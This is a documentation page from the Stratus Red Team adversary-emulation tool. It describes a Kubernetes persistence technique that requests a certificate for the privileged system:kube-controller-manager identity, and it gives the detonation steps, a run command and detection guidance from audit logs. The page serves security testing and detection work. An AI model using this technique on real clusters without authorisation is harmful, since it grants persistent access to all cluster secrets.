Skip to content

Create Client Certificate Credential

idempotent

Platform: Kubernetes

MITRE ATT&CK Tactics

  • Persistence

Description

Creates a client certificate for a privileged user. This client certificate can be used to authenticate to the cluster.

Warm-up: None

Detonation:

  • Create a certificate signing request (CSR)
  • Wait for the CSR to be picked up and return a certificate
  • Print the client-side certificate and private key

Note: This attack technique does not succeed on AWS EKS. Due to apparent undocumented behavior, the managed EKS control plane does not issue a certificate for the certificate signing request (CSR), even when approved. However, it is still relevant to simulate attacker behavior.

Note: The certificate is issued to system:kube-controller-manager because it exists in most clusters, and already has a ClusterRoleBinding to ClusterRole/system:kube-controller-manager which includes privileged permissions, such as access all secrets of the cluster and create tokens for any service account.

Instructions

Detonate with Stratus Red Team
stratus detonate k8s.persistence.create-client-certificate

Detection

Using Kubernetes API server audit logs. In particular, look for creation and approval of CSR objects, which do not relate to standard cluster operation (e.g. Kubelet certificate issuance).

OSZAR »